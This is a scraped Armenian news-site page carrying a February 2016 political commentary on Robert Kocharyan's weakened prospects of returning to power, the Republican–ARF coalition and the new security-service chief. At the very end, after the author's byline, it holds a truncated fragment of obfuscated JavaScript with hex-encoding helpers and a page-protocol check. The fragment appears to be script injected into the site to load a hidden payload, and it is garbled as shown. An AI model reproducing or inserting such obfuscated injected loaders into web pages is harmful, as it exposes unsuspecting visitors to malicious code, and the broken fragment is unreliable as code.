Գովազդ
 

Ամենաընթերցվածները

 

Արխիվ

< Փետրվար 2016 >
Եր Եր Չր Հն Ու Շա Կի
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 21
22 23 24 25 26 27 28
29            
 

Իրավունքը Facebook-ում

Joomla Templates and Joomla Extensions by ZooTemplate.Com
 
Քաղաքական
Շաբաթ, 20 Փետրվար 2016 13:33

ՌՈԲԵՐՏ ՍԵԴՐԱԿԻՉԸ ՓՈԽՈ՞ՒՄ Է ՄԱՍՆԱԳԻՏՈՒԹՅՈՒՆԸ

Եվ այսպես, «Ազատություն» ռադիոկայանը, որը հիշեցնենք` ԱՄՆ-ի իշխանությունների կողմից պաշտոնապես ֆինանսավորվող ռադիոկայան է, երեկ հրապարակեց Ռոբերտ Քոչարյանի` դեռեւս 2015-ի աշնանը տված հարցազրույցի ամբողջական տարբերակը: Մինչ այդ, տարբեր առիթներով ամերիկյան այդ ռադիոկայանը առանձին-առանձին կտորներ էր տալիս, որոնք «պատահականորեն» համահունչ էին լինում ընթացիկ քաղաքական գործընթացներին:

 

 

ՉԵՄ ՈՒԶՈՒՄ, ԲԱՅՑ ԴԻՐ ԳՐՊԱՆՍ
Դեռեւս 2008-ին ՀՀ երկրորդ նախագահը հայտարարել էր, որ մտադիր չէ երկար մնալ «ՀՀ ամենաերիտասարդ թոշակառուի» կարգավիճակում: Սակայն արդեն ութ տարի է, ինչ այդ կարգավիճակը պահպանվում է, ու նման է, որ Ռոբերտ Սեդրակիչը գրեթե ամբողջովին կորցրել է այդ կարգավիճակին հրաժեշտ տալու հույսը: Ահա նրա պատասխանը ռադիոկայանի` նրա քաղաքական նկրտումներին վերաբերող հարցին. «Սա հավանորեն ամենաքննարկվող թեման է, եւ իմ համար ամենափակ թեման: Քաղաքականությունում ասում են` երբեք մի ասա` երբեք: Ես ինձ հրաշալի եմ զգում այն կարգավիճակում, որն այժմ ունեմ, բայց հետագայում ինչ զարգացումներ կլինեն, դժվարանում եմ ասել»: Եվչեմ ցանկանում որոշակիություն մտցնել այս հարցում, եւ առաջին հերթին այն պատճառով, որ չկա որոշակիություն: Անձնական ցանկություն չունեմ կրկին վերադառնամ, մխրճվեմ, պատասխանատվություն վերցնեմ: Բայց հանգամանքները միշտ էլ մնում են հանգամանքներ»:
Հիշեցնենք, որ նախկին նախագահը դա ասել էր դեռեւս աշնանը, երբ դեռ վերջնական տեսքի էր բերվում նոր Սահմանադրության նախագիծը, երբ դեռ չէր կայացել սահմանադրական հանրաքվեն, ու դեռ հայտնի չէր` արդյոք ՀՀ իշխանությունները կկարողանան դիմագրավել երկրի ապակայունացման փորձերը:
Ըստ էության, Քոչարյանի ասածը հետեւյալն էր` չեմ ուզում, բայց դրեք գրպանս: Այսինքն` որ եթե հանգամանքները հարմար դասավորվեն, ապա անպայման դրանից կօգտվեմ: Բայց ՀՀ երկրորդ նախագահի հարցազրույցը այսօրվա դրությամբ մի տեսակ հնչում է կարապի երգի պես:
Հանգամանքները այդպես էլ չդասավորվեցին Ռոբերտ Քոչարյանի օգտին: Սահմանադրության տեքստը եղավ այնպիսին, որ ստվերից որեւէ հզոր քաղաքական ուժ ղեկավարելը ու հետո հանկարծ ԱԺ-ում «պալատական հեղաշրջում» անելով վարչապետի պաշտոնում հայտնվելը բացառվում է` ցանկացած քաղաքական ուժ ընտրությունների գնալու է` նախօրոք հայտարարելով վարչապետի իր թեկնածուին: Չստացվեցին նաեւ դրսից հրահրվող` ապակայունացման միջոցով հանրաքվեն տապալելու փորձերը, այդ թվում եւ` հանրաքվեից օրեր առաջ ԱԱԾ-ն վնասազերծեց վիթխարի զինանոց հավաքած ապօրինի զինված խումբը:
Արա Աբրահամյանին խաղարկելու տարբերակն էլ լիարժեքությամբ չի փայլում. ըստ Սահմանադրության` այդ մարդը հնարավորություն չունի գլխավորել որեւէ համամասնական ցուցակ կամ լինել վարչապետի թեկնածու: Եվ վերջապես, դաշնակները, ում տեսականորեն հնարավոր էր համարել ապագա խորհրդարանական հենարան կամ քոչարյանամետ խորհրդարանական կոալիցիայի բաղկացուցիչ մաս, գնացին կոալիցիայի ՀՀԿ-ի հետ:
Եվ հիմա Ռոբերտ Քոչարյանին մնում է մտքում բացականչել` ինչ մնաց ինձ` Վարդան Օսկանյան, ուրիշ ոչինչ: Այսինքն` ԲՀԿ-ի օսկանյանական թեւը  գումարած քարոզչամիջոցներ: Այնպիսի համեստ ռեսուրս, որն անգամ այսօրվա կործանված ընդդիմադիր դաշտի պայմաններում չի կարողանա ապագա խորհրդարանում ապահովել  քչից-շատից ազդեցիկ քաղաքական ընդդիմություն, ու առավել եւս, խոսք չի կարող լինել ավելի մեծ ամբիցիաների մասին:
Դե ինչ, մնաց իրոք հենց «ամենաերիտասարդ թոշակառուի» տարբերակը: Թոշակառուի, որը առույգ է, սպորտով է զբաղվում, գիրք կարդում եւ գիրք գրում, ու կարգավիճակից ելնելով` ավելի ու ավելի հակվում փիլիսոփայությանը: Եվ, ի դեպ, իր հարցազրույցում Ռոբերտ Սեդրակիչը բավականին շատ է փիլիսոփայում, բավականին շատ է տրվում հուշերի` թե ինչ լավ էր Հայաստանում իր իշխանավարության տարիներին:
ՔԱՅԼ ԴԵՊԻ ԱՋ, ՔԱՅԼ ԴԵՊԻ ՁԱԽ... ԲԱՆ ՉԻ ՍՏԱՑՎԻ
Ինչպես «նարնջագույն», այնպես էլ քոչարյանական քարոզչամեքենաները առավելագույն թույնով արտահայտվեցին Սերժ Սարգսյանի ծրագրային ելույթի, ինչպես նաեւ ԱԱԾ նոր տնօրեն նշանակելու թեմային: Մեկը մյուսի հետ կապակցված է` ՀՀ նախագահի ելույթի կարեւոր բաղկացուցիչներն էին սեփական քաղաքական թիմին եւ բյուրոկրատական մեքենային առաջադրվող չափանիշների փաթեթը ու սերնդափոխության սկզբունքները: Ճիշտ է, երկրի ղեկավարը մատնանշեց, որ հեղափոխական բնույթի փոփոխություններ չեն լինի, սակայն 34-ամյա Կուտոյանի նշանակումը` այդպիսի առանցքային պաշտոնում, ցույց տվեց, որ կադրային լուծումները կարող են լինել շատ կտրուկ: Կոռուպցիայի դեմ պայքարի առաջնայնության շեշտումն էլ շատերին անհանգստացրեց:
Շատերի մոտ այն տպավորությունը ստեղծվեց, որ ԱԱԾ-ն առաջին հերթին կոռուպցիոն դրվագներ փնտրելու է հենց այն մարդկանց մոտ, ովքեր կուրսից շեղվելու են, եւ հիմա կուլիսներում ենթագիտակցական վախի ուրվականն է շրջում: Ու առաջին հերթին` վախը համակում է բյուրոկրատիայում կամ քաղաքական թիմում առկա ստվերային լոբբինգի խմբերի մեջ մտնողներին: Անկախ նրանից, թե կոռուպցիայի դեմ պայքարի ուղտը առաջնահերթ ում դռանը կչոքի, կամ ընդհանրապես դռների հարցում ջոկողություն կանի, թե` ոչ, լոբբիստական խմբերն իրենց կաշկանդված են զգում:
Կաշկանդված են զգում Ռոբերտ Սեդրակիչի հետ ջերմ հարաբերություններ պահպանած ու նրան «տակից» աջակցող կադրերը: Կաշկանդված են զգում նրանք, ովքեր թույլատրելիից ավել կապեր ունեն արեւմտյան կառույցների հետ: Կաշկանդված են զգում եւ այլ հատվածական կամ գլոբալ շահը ներկայացնող խմբերը:
Բայց միաժամանակ կաշկանդված են զգում եւ ընդդիմադիր դաշտի որոշ ներկայացուցիչներ` նրանք, ովքեր նախկին իշխանավորներ են:
Ու եթե անդրադառնանք Ռոբերտ Քոչարյանի հնարավոր ակտիվացման հարցին, ապա բյուրոկրատիայի ներսում էլ նախկին նախագահը խաղ տալու առանձնապես տեղ չի ունենում:
ԻՆՉՈՒ ՁԳՁԳՎԵՑ ԿՈԱԼԻՑԻԱՅԻ ՊԱՇՏՈՆԱԿԱՆ ՀՌՉԱԿՈՒՄԸ
ՀՀԿ ԳՄ վերջին նիստից հետո ճեպազրույցում ՀՀԿ խոսնակ Էդուարդ Շարմազանովը բազում գեղեցիկ խոսքեր ասելով ՀՅԴ-ի հասցեին` նաեւ տեղեկացրեց, որ կոալիցիոն հռչակագրի տեքստը պատրաստ է ստորագրման, սակայն բանակցություններն ու խորհրդակցությունները շարունակվելու են այնքան` մինչեւ չհամաձայնեցված հարց ընդհանրապես չմնա:
Այսինքն` ՀՅԴ-ի հետ կոալիցիա կազմելու հարցին, թեեւ դաշնակները կրտսեր գործընկերոջ կարգավիճակում են, ՀՀԿ-ն մտենում է շատ ծանրակշիռ եւ լուրջ: Տրամաբանությունը պարզ է` կա ձգտում կոալիցիոն համագործակցությունը դարձնել այնքան կայուն եւ սերտ, որպեսզի ՀՅԴ-ի հայտնությունը այս կամ այն ոչ իշխանական դաշինքում` լինի դա բացահայտ, թե ստվերային տարբերակով, իսպառ բացառված լինի: Այդ պատճառով է, որ ՀՅԴ-ի քաղաքական կշռից անհամամասնորեն շատ պորտֆելներ է ստանում այդ կուսակցությունը, ու դա նույն ՀՀԿ-ի կողմից ապագա որոշ քաղաքական ռիսկերը կանխող քայլ պետք է դիտարկել:
Ու արդյունքում ՀՅԴ-ի հետ «բլոկավորվելու» հեռանկարից են զրկվում Ռոբերտ Սեդրակիչը, Արա Արշավիրիչը եւ Արթուր Վահանիչը:
Արա Աբրահամյանի պարագայում ստացվում է այնպես, որ միգուցե ալամ աշխարհի հայերի առաջնորդի համար նույնիսկ իմաստազրկված դառնա ՀՀ քաղաքական դաշտ մտնելը,  առավել եւս, որ նա իր վերջին հարցազրույցում խոստովանել է, որ Հայաստանի քաղաքական կյանքին նրա միջամտությանը ամենից շատ իր ընտանիքն է դեմ: Իսկ ինչպես հայտնի է, Ա. Աբրահամյանի ընդհանրապես ամբողջ կարիերայում վիթխարի դեր է խաղացել նրա աներոջ տոհմը...
Իսկ ինչ վերաբերում է ռեբրենդինգ անցնող եւ «Հայկական վերածնունդ» դարձող ՕԵԿ-ին, ապա, ամենայն հավանականությամբ, այդ կուսակցությանը կմնա ԱԺ-ում սեփական ներկայության խնդիրը լուծելը, ու ոչ ավելին: Ու այդ կուսակցության ռեբրենդինգը նաեւ օգտակար տարր է պարունակում` կլանելու միջոցով ՕԵԿ-ն, ըստ էության, ուտիլիզացիայի է ենթարկում բազում մանր-մունր եւ վաղուց իմաստազրկված կուսակցություններ, այդ թվում եւ` մարդ-կուսակցություններ:
ՀՈՎՀԱՆՆԵՍ ԳԱԼԱՋՅԱՆ
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o ){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e